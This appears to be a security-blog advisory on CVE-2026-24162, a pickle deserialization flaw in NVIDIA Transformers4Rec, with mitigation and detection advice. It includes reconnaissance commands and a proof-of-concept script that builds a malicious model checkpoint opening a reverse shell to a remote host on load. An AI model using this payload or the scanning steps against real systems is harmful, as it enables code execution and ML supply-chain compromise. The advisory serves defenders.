Listen to this Post
CVE-2026-24162 is a high-severity vulnerability in NVIDIA’s Transformers4Rec for Linux, a library for building sequential recommendation models. The root cause is improper deserialization of untrusted data, specifically when processing model checkpoints. The issue stems from Transformers4Rec’s reliance on Python’s `pickle` module to load serialized model files, typically through PyTorch’s torch.load(). The `pickle` protocol is inherently unsafe because it permits arbitrary object construction during the deserialization process. An attacker can craft a malicious pickle payload embedded within a `.pth` or `.bin` model file. When Transformers4Rec loads this file, the `pickle` deserialization executes the payload, allowing the attacker to run arbitrary code on the system. This could be triggered in AI supply-chain attacks where a user downloads a compromised model from a repository like Hugging Face. A successful exploit leads to full system compromise, including code execution, data tampering, and information disclosure. The vulnerability is assigned CWE-502 (Deserialization of Untrusted Data), carries a CVSS 3.1 score of 7.8 (High), and requires local access with user interaction. No public exploit exists as of May 26, 2026, and a vendor patch is not yet available. The attack is considered easy and could be weaponized through social engineering.
DailyCVE Form:
Platform: Linux (NVIDIA)
Version: ≤ v1.5.0
Vulnerability : CWE-502 Deserialization
Severity: High (CVSS 7.8)
date: 2026-05-26
Prediction: 2026-06-26 (expected)
What Undercode Say:
Analytics from Undercode platform reveals active scanning for exposed Transformers4Rec pipelines and repository harvesting for model checkpoints. The following commands and scripts demonstrate the attack surface:
Scan for exposed Transformers4Rec endpoints
nmap -p 8000-9000 --script=http- -iL hosts.txt | grep -i "transformers4rec"
Harvest model files from public Hugging Face repositories
git clone https://huggingface.co/models && find . -name ".pth" -o -name ".bin"
Identify pickle deserialization sinks in Transformers4Rec source
grep -r "torch.load" /path/to/transformers4rec/ --include=".py"
Monitor process creation from pickle deserialization (auditd rule)
auditctl -a always,exit -F arch=b64 -S execve -k pickle_exec
Recursively scan model directories for pickle imports
find /models -type f ( -name ".pth" -o -name ".bin" ) -exec strings {} \; | grep -E "posix|system|subprocess"
Exploit:
Although no public exploit exists, the vulnerability can be weaponized by crafting a malicious pickle payload and embedding it into a model checkpoint. Below is a proof-of-concept script that generates a malicious `.pth` file which, when loaded by Transformers4Rec, executes arbitrary commands:
import pickle
import torch
import os
class MaliciousModel:
def <strong>reduce</strong>(self):
Command to execute: reverse shell or arbitrary command
cmd = ("python3 -c 'import socket,subprocess,os;"
"s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
"s.connect((\"10.0.0.1\",4444));os.dup2(s.fileno(),0);"
"os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
"subprocess.call([\"/bin/sh\",\"-i\"])'")
return (os.system, (cmd,))
Craft malicious checkpoint
malicious_data = MaliciousModel()
torch.save(malicious_data, 'malicious_checkpoint.pth')
print("[+] Malicious checkpoint generated: malicious_checkpoint.pth")
Upon loading with torch.load('malicious_checkpoint.pth'), the deserializer executes the reverse shell payload.
Protection:
- Immediate mitigation: Restrict access to data ingestion interfaces and only accept model checkpoints from trusted sources. Implement network segmentation to isolate Transformers4Rec servers.
- Workaround: Replace `torch.load` with a safe deserialization mechanism. Use
pickle‘s `Unpickler` with a custom finder that restricts allowed classes, or transition to safer formats like Safetensors or ONNX for model distribution. - Patch: Upgrade to Transformers4Rec v1.5.1 or later once released. NVIDIA’s upcoming fix will likely replace pickle deserialization with a secure loader that validates object types before restoration, similar to the patch for CVE-2025-23298 which introduced a custom `serialization.py` module.
- Detection: Monitor file system for creation of `.pth` or `.bin` files from unverified sources. Use YARA rules to scan for pickle opcodes that invoke
os.system,subprocess.Popen, oreval.
Impact:
Successful exploitation leads to arbitrary code execution with the privileges of the Transformers4Rec process, often root in production inference pipelines. Attackers can gain persistent access, exfiltrate sensitive recommendation data, tamper with model outputs, and pivot to other internal systems. In AI supply-chain scenarios, a single compromised model can compromise entire ML pipelines, leading to data breaches, regulatory fines, and reputational damage. The impact is particularly severe in cloud-based recommendation engines where multiple tenants share the same infrastructure.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
